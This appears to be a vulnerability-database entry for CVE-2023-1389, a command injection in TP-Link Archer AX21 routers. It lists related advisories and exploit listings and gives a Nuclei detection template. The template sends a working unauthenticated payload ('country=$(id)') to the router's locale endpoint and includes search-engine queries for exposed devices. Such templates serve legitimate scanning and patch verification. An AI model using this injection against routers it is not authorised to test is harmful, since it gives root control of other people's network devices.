| Title | Published | Views | Reporter |
|---|---|---|---|
| TP-Link Archer AX21 - Unauthenticated Command Injection Exploit | 10 Aug 2023 00:00 | – | zdt |
| Exploit for CVE-2014-8361 | 31 Mar 2026 11:18 | – | githubexploit |
| Exploit for Command Injection in Tp-Link Archer_Ax21_Firmware | 28 Jul 2023 03:09 | – | githubexploit |
| Exploit for Command Injection in Tp-Link Archer_Ax21_Firmware | 8 May 2024 05:41 | – | githubexploit |
| CVE-2023-1389 | 15 Mar 2023 00:00 | – | attackerkb |
| The vulnerability in the web interface for managing TP-Link Archer AX21 (AX1800) routers allows a hacker to execute arbitrary commands with root privileges. | 30 Mar 2023 00:00 | – | bdu_fstec |
| CVE-2023-1389 | 25 Apr 2023 11:56 | – | circl |
| TP-Link Archer AX-21 Command Injection Vulnerability | 1 May 2023 00:00 | – | cisa_kev |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 1 May 2023 12:00 | – | cisa |
| TP-LINK Archer AX21 Command Injection Vulnerability | 15 Mar 2023 00:00 | – | cnnvd |

```yaml
id: CVE-2023-1389

info:
  name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
  impact: |
    Unauthenticated attackers can exploit OS command injection through the country parameter in the locale endpoint to execute arbitrary commands as root and completely compromise TP-Link Archer AX21 routers.
  remediation: |
    Update to the latest firmware version provided by TP-Link.
  reference:
    - https://www.tenable.com/security/research/tra-2023-11
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1389
    - https://github.com/tenable/poc-cve-2023-1389
  classification:
    cve-id: CVE-2023-1389
    cwe-id: CWE-78
    epss-score: 0.99999
    epss-percentile: 0.99991
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: tp-link
    product: archer-ax21
    fofa-query: body="tp-link"
    shodan-query: 'title:"TP-Link Router"'
    verified: true
  tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev,vkev,vuln

http:
  - raw:
      - |
        POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=write&country=$(id)
      - |
        POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=write&country=$(id)

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ec06314af8324f7ba7322f573e3f0981afd84f4e9625798ba176b6ca4dcf7ffc022100f7e73f6b513b90404a501364719d3dfecddcde50f66a04760011ae82b59035af:922c64590222798bb761d5b6d8e72950
```